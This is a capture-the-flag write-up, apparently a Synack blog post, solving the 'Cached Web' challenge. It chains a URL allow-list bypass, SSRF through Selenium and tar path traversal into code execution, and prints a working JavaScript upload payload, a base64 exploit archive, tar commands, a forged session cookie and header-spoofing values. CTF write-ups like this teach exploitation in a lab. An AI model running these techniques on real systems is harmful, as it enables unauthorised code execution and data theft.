Author: SRT, Dylan (bamhm182/BytePen online)
Synack held a miniature Capture the Flag event from [email protected] until [email protected] This event consisted of only one challenge and promised a percentage of time off of the total time of their full #TeamAmerica Defenders CTF that took place from [email protected] until [email protected] You can find out more information here.
I have only had the chance to participate in a couple of Synack CTFs, and while the prizes are great, they pale in comparison to a chance to join the Synack Red Team (SRT).
About the Author
My name is Dylan (bamhm182/BytePen online) and out of 150 participants, I was one of only two who managed to solve this challenge while the CTF was active. The complexities of this challenge caused quite a bit of strife for those who aimed to complete it, and as such, I’ve had many people reach out asking how it worked. I enjoy writing CTF write-ups (which I normally post to one of my GitLab groups) when I’m able to, and was incredibly excited when I reached out to Synack and they offered me the chance to write this blog post.
I have traditionally served more of a “Help Desk IT” role through my working life, with a transition into Software Development a few years back, and another into Penetration Testing type work in 2019. I joined the Synack Red Team (SRT) in February of 2020 and have had the exciting opportunity to complete over 600 Missions and a small collection of vulnerabilities since I was onboarded. I would still consider myself very new to this career field and find it mind blowing the amount of work I’ve been able to complete and the amount of practical knowledge I’ve been able to obtain through being a member of the SRT.
Anyway, enough about me. Let’s get to what you all came here for: the write-up for the Cached Web challenge of the Synack TeamAmerica Defenders CTF!!!
Cached Web
When visiting the HackTheBox CTF page for this challenge, we are given the description “I made a service for people to cache their favorite websites, come and check it out!” and the zip file containing the challenge here.
If you’re at all interested, I highly recommend that you download the zip for this challenge and give it a go before continuing to read this page. It utilizes Docker, so you will need to have that installed, but other than that, you should simply be able to run the shell script that is included (or run the commands within the shell script if you’re using Windows. They’re the same commands). When you run it, it will be available on http://localhost:1337 and you should be presented with the web application seen below:
One note I would like to make that may not be immediately obvious to those not familiar with Docker is that at any time, you can use the command docker exec -it web_cached_web /bin/ash to “drop into” the running docker container. This will allow you to modify the code as it runs in real time and will help you explore how exactly things are working behind the scenes. I will use this tactic and reference it in the rest of the write-up.
At first glance, I thought this was going to be cake. Not only were we provided the source code for the application, but the application itself didn’t seem that complicated. Without looking deeply into it, I figured that it would be some sort of Insecure Direct Object Reference (IDOR), Local File Inclusion (LFI) or Server Side Request Forgery (SSRF) attack. None of these were too far off, but I drastically overestimated how easy it would be to pull off.
The first thing that I like to do when presented with a challenge like this is to determine what exactly the program is intended to do and maybe gain some information about how it works. After playing with this, we determine that the application works by reaching out to the website you entered, taking a screenshot of whatever loads, and then giving you the screenshot. It does this using browser automation software named Selenium, which controls a Google Chrome based browser.
As an example, when entering https://google.com/search?q=test, you get the following, which tells us that it does actually reach out to the internet as opposed to providing you with pre-created screenshots.
The problem here is that if you look at util.py, you will notice that there are only 3 allowed domains: google.com, amazon.com, and twitter.com.
def is_scheme_allowed(scheme):
    return scheme in ['http', 'https']

def is_domain_allowed(domain):
    # TODO: Unrestrict when we reach production stage
    return domain in ['google.com', 'amazon.com', 'twitter.com']
Additionally, you’ll find that trying a subdomain, such as sites.google.com, gets the request rejected, so the hostname that the code extracts must match one of these entries exactly.
We can examine the following code from util.py to learn how the domain and scheme are determined and evaluated:
def cache_web(url):
    domain = urlparse(url).hostname
    scheme = urlparse(url).scheme

    if not domain or not scheme:
        return flash(f'Malformed url {url}', 'danger')
    elif not is_scheme_allowed(scheme):
        return flash(f'Scheme {scheme} is not allowed', 'danger')
    elif not is_domain_allowed(domain):
        return flash(f'Domain {domain} is not allowed', 'danger')
    elif cache.exists(domain):
        return serve_cached_web(url, domain)
    elif is_html(url):
        return serve_screenshot_from(url, domain)
This is where I had a really lucky break.
I was throwing random values into the URL field to see if I could make anything abnormal happen and saw the following message when I entered http://google.com[:-10]
I was definitely expecting that my domain would be google.com, not :-10, so that told me there may be something there.
I tried entering a few websites like https://ebay.com[google.com], which never loaded, and https://ebay.com/[google.com], which told me ebay.com is not allowed. I eventually stumbled upon https://ebay.com[google.com], which gave me the following:
You should notice that at the top, it says the domain is google.com, yet the image is very obviously ebay.com. Bingo!
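To see why the bracket trick fools the check, here is a minimal sketch of the host extraction logic. It is a simplified re-creation of the partition-based parsing that older versions of Python's urllib.parse used, not the library code itself, and it assumes the challenge container ran such a version. As far as I know, newer Python releases validate bracketed hosts and raise a ValueError instead. The function name legacy_hostname is my own.

```python
def legacy_hostname(netloc):
    """Simplified re-creation of the old partition-based host parsing."""
    # Drop any userinfo ("user:pass@") in front of the host.
    _, _, hostinfo = netloc.rpartition("@")
    # If a "[" appears anywhere, everything before it is discarded and the
    # text between the brackets is treated as the (IPv6-style) host.
    _, has_bracket, bracketed = hostinfo.partition("[")
    if has_bracket:
        hostname, _, _ = bracketed.partition("]")
    else:
        hostname, _, _ = hostinfo.partition(":")
    return hostname.lower() or None


def is_domain_allowed(domain):
    # Same allow list as the challenge's util.py.
    return domain in ["google.com", "amazon.com", "twitter.com"]


for netloc in ["google.com", "sites.google.com",
               "google.com[:-10]", "ebay.com[google.com]"]:
    host = legacy_hostname(netloc)
    print(netloc, "->", host, "allowed" if is_domain_allowed(host) else "rejected")
```

The allow list only ever sees the text between the brackets, while the browser is handed the full original URL, which is why the banner says google.com but the screenshot shows ebay.com.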
So where do we go from here? If we can make the website visit ebay.com, perhaps we can make it visit any website. I was thinking that perhaps I could try something like https://sites.google.com/d/mywebsite[google.com], but a couple problems arose from this.
Namely, having any sort of / broke the domain name manipulation.
If we visit https://drive.google.com[google.com], we see Bad Request Error 400 instead of an error message stating that we cannot visit drive.google.com.
With that, we can determine that whatever we need to happen must happen at the root of whatever domain we are using and that we are able to use subdomains with this workaround.
The quickest way I could think to make this happen was to add a subdomain to one of my domains and store some code in an Amazon AWS S3 Bucket.
I won’t go into too much detail on this because there are a thousand tutorials on how to host a static website on AWS and point a subdomain at it, but at a real basic level, I created the bucket htb.bpen.io and put in a very basic index.html that would prove it’s working by visiting the S3 url.
I then created a new CNAME record that points htb.bpen.io to s3-website-us-east-1.amazonaws.com.
I made sure that I could see my test page by visiting http://htb.bpen.io directly. However, when I visited the website within the challenge via http://htb.bpen.io[google.com], I saw the following:
This isn’t a problem, and actually gives us a hint we can use to progress further if we’re paying attention and gives us more information as to what exactly is happening. We can see that the requested key “[google.com]” is not found.
In “AWS Speak”, this means 404: File not found for http://htb.bpen.io/[google.com], so it’s looking for a file named [google.com] inside of my bucket. Let’s rename index.html to [google.com] and try again.
Now we get the following:
Perfect! Now we just need to figure out how to leverage this to get it to spit out the flag.
If we dig through the source code some more, we find this code that looks pretty interesting within routes.py:
# TODO: Boot up the selenium grid for the scraper we're working on
@is_bot
@api.route('/upload', methods=['POST'])
@is_from_localhost
def upload():
    if 'file' not in request.files:
        return abort(400)
    if extract_from_scraper(request.files['file']):
        return 'ok', 200
    return '', 204
I’ll explain the decorators (@is_bot and @is_from_localhost) more down in the Rabbit Holes section below, because I definitely spent a long time on them, but for now we’ll just accept that this means “selenium must be the one to use this endpoint” because that’s the security that these decorators provide.
We determine that if a file is provided to this URL, it will be passed to extract_from_scraper(), which we can see in util.py:
def extract_from_scraper(file):
    tmp = tempfile.gettempdir()
    path = os.path.join(tmp, file.filename)
    file.save(path)

    if tarfile.is_tarfile(path):
        tar = tarfile.open(path, 'r:gz')
        tar.extractall(tmp)

        for name in filter(lambda x: x.endswith('.png'), tar.getnames()):
            filename = f'{generate(14)}.png'
            os.rename(os.path.join(tmp, name), f'{main.app.config["UPLOAD_FOLDER"]}/{filename}')
            cache.new(name[:-4], filename)

        tar.close()
        return True

    return False
This code will take the file sent to api/upload and save it to /tmp, then it will make sure that it is a tar file and try to open it with r:gz (which will make sure it is a gzip file).
I removed the @is_bot and @is_from_localhost from the upload() route within the local docker container and started throwing stuff at this until I got something to work.
Eventually, I determined that if I uploaded the following code to my http://htb.bpen.io[google.com] file and then visited this URL within the application, it would create a request on behalf of selenium that uploads a file I have stored in the b64Data variable to api/upload.
This JavaScript may look a bit complex if you are unfamiliar with it, but it isn’t terrible if broken down. I am storing the base64 of a test .tar.gz file in the variable b64Data, then I am converting this into a “blob”, which can be sent as part of a FormData object using an XMLHttpRequest.
This base64 came from the command echo "hi" > test.txt && tar cvzf - test.txt | base64 | tr -d "\n", which will create a file named test.txt containing ‘hi’, then create the base64 of a gzipped tar file containing test.txt on one line so it can easily be inserted into the file.
<!DOCTYPE html>
<html>
<body>
<script>
const b64Data="H4sIAAAAAAAAA+3OMQqDQBSE4a09xZ5A9u1bXa9jIKCFjT7B48eAgk0QBAnC/zVTzBRj78lKW8zdKKzqlL4puQrH3KgTzZoka6XrTmKM4ny489RunqwdvXevdugGaeKv3Vn/UF1f/PsCAAAAAAAAAAAAAAAAAOCCDzOulTgAKAAA";
const byteCharacters = atob(b64Data);
const byteArrays = [];
const sliceSize=512;
const contentType='multipart/form-data';
for (let offset = 0; offset < byteCharacters.length; offset += sliceSize) {
    const slice = byteCharacters.slice(offset, offset + sliceSize);
    const byteNumbers = new Array(slice.length);
    for (let i = 0; i < slice.length; i++) {
        byteNumbers[i] = slice.charCodeAt(i);
    }
    const byteArray = new Uint8Array(byteNumbers);
    byteArrays.push(byteArray);
}
const blob = new Blob(byteArrays, {type: contentType});
var formData = new FormData();
formData.append('file', blob, 'test.tar.gz');
var xhr = new XMLHttpRequest();
xhr.open('POST','http://localhost:1337/api/upload', true);
xhr.send(formData);
</script>
</body>
</html>
Once the application has visited this page, we can go into the docker container and we will see our file at /tmp/test.txt.
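For anyone who would rather not use the shell, the same kind of test payload can be produced in Python. This is a minimal sketch using only the standard library; the helper name make_b64_targz is my own, and the resulting base64 will not match the string above byte for byte because timestamps and ownership metadata differ.

```python
import base64
import io
import tarfile


def make_b64_targz(name, content):
    """Return the base64 text of a gzip-compressed tar holding one file."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w:gz") as tar:
        info = tarfile.TarInfo(name=name)
        info.size = len(content)
        tar.addfile(info, io.BytesIO(content))
    return base64.b64encode(buffer.getvalue()).decode("ascii")


b64_data = make_b64_targz("test.txt", b"hi\n")

# Round trip: decode the text again and open it with the same mode the
# challenge code uses ('r:gz') to confirm it is both gzip and tar.
raw = base64.b64decode(b64_data)
with tarfile.open(fileobj=io.BytesIO(raw), mode="r:gz") as tar:
    names = tar.getnames()
    content = tar.extractfile("test.txt").read()

print(names, content)
```

The value of b64_data can be pasted into the b64Data variable of the page in place of the shell output.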
You may note that the code in extract_from_scraper() doesn’t actually do anything to make sure that the files are extracted to any specific location. It just extracts to wherever tar wants to extract them.
You’re well prepared if you know about the -P flag for tar, which is described in the man page as “Don’t strip leading slashes from file names when creating archives.” It will allow us to specify exactly where we want the file to be extracted, based on some file path manipulation.
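The effect of keeping a ../ prefix in a member name can be sketched without extracting anything. The example below builds a small archive in memory and only computes where each member would land if it were joined to the extraction directory with no checks, which is my reading of what the challenge code allows. The helper names are my own, and it deliberately avoids calling extractall(), since newer Python versions apply extraction filters that may refuse such members.

```python
import io
import posixpath
import tarfile


def build_archive(member_name, content):
    """Create an in-memory .tar.gz with a single, arbitrarily named member."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w:gz") as tar:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(content)
        tar.addfile(info, io.BytesIO(content))
    buffer.seek(0)
    return buffer


def resolved_targets(archive, extract_dir):
    """List where each member would land if extracted without any checks."""
    with tarfile.open(fileobj=archive, mode="r:gz") as tar:
        return [
            posixpath.normpath(posixpath.join(extract_dir, name))
            for name in tar.getnames()
        ]


archive = build_archive("../app/application/util.py", b"# replaced\n")
targets = resolved_targets(archive, "/tmp")
print(targets)
```

A member named ../app/application/util.py, extracted relative to /tmp, resolves to a path inside /app rather than inside /tmp.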
From here, there are probably a thousand ways to complete this challenge. I decided that I wanted to modify the python to put /app/flag (the location of the flag as determined by inspecting the provided zip and the Docker container) somewhere I knew I could read it, such as /app/application/static/screenshots/flag.txt (the location of screenshots within the application).
On my local box, I created /tmp/app/application and copied the file util.py from the source code to this new folder. After inspecting the code, I learned that flash() is executed every time that the banner at the top of the page appears. Since it’s easy to call, I figured it would be a good candidate for my code to retrieve the flag. I then modified the function flash() as seen below:
Original
def flash(message, level, **kwargs):
    return { 'message':message, 'level':level, **kwargs }
Modified
def flash(message, level, **kwargs):
    os.rename('/app/flag', '/app/application/static/screenshots/flag.txt')
    return { 'message':message, 'level':level, **kwargs }
I then cd’d to /tmp/app and ran tar cvzPf - ../app | base64 | tr -d "\n" to get the following base64:
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
I updated my JavaScript from before with this new b64Data payload, put it in my S3 bucket with the name [google.com], and visited http://htb.bpen.io[google.com].
I saw the following on the challenge page:
If we visit the page http://localhost:1337/static/screenshots/flag.txt right this second though, it won’t be there.
That’s because the newly added code hasn’t actually run yet.
Now we can enter absolutely anything that would cause the banner to appear and our os.rename() action will take place.
I visited https://google.com and noticed it took a very long time to complete, then I went to the aforementioned flag URL (http://localhost:1337/static/screenshots/flag.txt) and saw the flag HTB{f4k3_fl4g_f0r_t3st1ng}:
Now it’s time for the real deal!
We spin up our docker container from the HTB CTF infrastructure and go to our assigned port (ex: docker.hackthebox.eu:30183).
We enter our payload url of http://htb.bpen.io[google.com] and make sure everything works like we expect.
Then we enter anything to make the flash() banner appear and navigate to our flag URL.
We can then see our flag HTB{sl1p_sl1p_dr1p_dr1p…RCE!}:
Rabbit Holes
I went down a few rabbit holes in this challenge, and figured I’d spend a few seconds talking about the ones I remember here.
I’m sure there are a lot that I can’t remember, but these are the ones that took the most time for me.
api/upload decorators
There are two decorators on the upload() function that is mapped to /api/upload; @is_bot and @is_from_localhost.
I figured out that there is a session cookie like the following:
eyJyb2xlIjoiZ3Vlc3QifQ.X3D8SA.xTyWyIERtL6l8AkK5cb_N7Vn8Tw
You should note that this looks like base64 and is delimited by periods. This is how the application stores session variables.
If you decode the first portion, you’ll see something like {"role": "guest"}.
I found out that if I base64 encode {"role": "guest", "bot": "yes"}, I can set the token to the following in any requests and then bypass @is_bot:
eyJyb2xlIjogImd1ZXN0IiwgImJvdCI6ICJ5ZXMifQ.X3D8SA.xTyWyIERtL6l8AkK5cb_N7Vn8Tw
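The decoding and re-encoding of that first segment can be reproduced with a few lines of Python. This is a minimal sketch that assumes the segment is URL-safe base64 of a JSON object with the padding stripped, which matches the two tokens shown here. It only handles the first segment and leaves the other two untouched; the helper names are my own.

```python
import base64
import json


def decode_payload(cookie):
    """Decode the first dot-separated segment of the cookie into a dict."""
    payload = cookie.split(".")[0]
    # Restore the "=" padding that was stripped from the base64 text.
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def encode_payload(data):
    """Encode a dict the same way, without padding."""
    raw = json.dumps(data).encode("utf-8")
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


original = "eyJyb2xlIjoiZ3Vlc3QifQ.X3D8SA.xTyWyIERtL6l8AkK5cb_N7Vn8Tw"
print(decode_payload(original))

new_segment = encode_payload({"role": "guest", "bot": "yes"})
# Swap in the new first segment and keep the remaining two as they were.
print(".".join([new_segment] + original.split(".")[1:]))
```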
The hard part is bypassing @is_from_localhost.
Normally, you MAY be able to set additional request headers like the following to bypass checks like these. However, I couldn’t get it to work in this instance:
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
I eventually figured out that you could add the following code to various points of the python and get it to output the request.remote_addr variable to the logs:
import sys
print(request.remote_addr, file=sys.stderr)
No matter what I did, it always returned that the variable was empty.
I feel like there is a way to bypass this, which would allow you to make a POST request within Burp Suite to upload a file instead of having to do the custom (hosted) JavaScript above, but I couldn’t figure it out.
What do I upload?
Even after finally figuring out how to upload a tar, I spent a very long time working out how to turn that ability into something that I could exploit.
My original thought was that, because of the png handling in the extract_from_scraper() code above, I needed to figure out how to get RCE on the target by uploading some sort of malicious image and visiting it or getting selenium to visit it.
At one point, I created a tar.gz file as I did above with a .png inside.
I found out that if I visited my website as done in the walkthrough two times within 10 seconds, I could make whatever image I wanted appear as seen below:
This was cool, but ultimately pointless since the file always ended in .png and to the best of my knowledge, there’s no way to directly execute server-side code by visiting an image. This may be possible since selenium is the one requesting the image, but that’s above my current level of expertise.
Tar Trouble
I spent a very long time trying to figure out how to upload a file to the server.
I had a POST request I was trying for a while with the Content-Type multipart/form-data and the file with either base64 or the bytestring as the body.
I kept getting files on the server that were either tar OR gzip, never both.
I probably spent a good few hours trying to upload something that worked before giving up on submitting a POST request directly and going for the JavaScript above.
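One possible explanation for the "tar OR gzip, never both" symptom is that the archive bytes were being altered on the way in, for example by sending base64 text or a text-encoded bytestring rather than the raw bytes. The sketch below shows how a multipart/form-data body carrying the raw bytes could be assembled by hand. It has not been tested against the challenge, the function name and the application/gzip part type are my own choices, and it would still need the decorators removed (or a localhost origin) to reach the endpoint.

```python
import uuid


def build_multipart(field, filename, data):
    """Return (content_type, body) for a single-file multipart upload."""
    boundary = uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/gzip\r\n"
        "\r\n"
    ).encode("ascii")
    tail = f"\r\n--{boundary}--\r\n".encode("ascii")
    # The file bytes go in untouched: no base64, no text encoding.
    return f"multipart/form-data; boundary={boundary}", head + data + tail


sample = bytes(range(256))  # stand-in for the real .tar.gz bytes
content_type, body = build_multipart("file", "test.tar.gz", sample)
print(content_type, len(body))
```

The returned content_type value belongs in the Content-Type request header, and body is the request body exactly as returned.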
For a while, I went down the path of thinking that the tar’s name was the thing I was supposed to be modifying.
I ended up changing my JavaScript a few times to give the file names like ../app/application/whatever.tar.gz and noticed that I could put the tar file wherever I wanted.
This may be useful in some circumstances, however, it wasn’t useful for me here.
Conclusion
This was a very difficult CTF that took me many hours of pounding my head against my keyboard. If you tried and didn’t get it, you should absolutely not feel ashamed or discouraged. Instead, I encourage you to keep the information here in the back of your mind in case you ever run into this in the future. Unlike many CTF challenges, I found this one to be very “true to life” in that it required me to throw stuff at the wall until something stuck, which ended up being a weird bug within a popular python library that real-world developers may be using and in a way that real-world developers may be using it. While it may be unlikely that something like this would be implemented in this exact manner, I could absolutely see a circumstance in which you are assessing a website with a python backend and that website contains the same sort of validation check to ensure that whatever file is being requested is within one of their approved domains. If you happened to be the SRT member who stumbled across that bug, that’d net you quite a bit more than the first place prize of 25% off your time in the next CTF.
I hope that this write-up has taught you something or at the very least, you enjoyed reading it. If so, please reach out to me in the Synack Red Team Slack!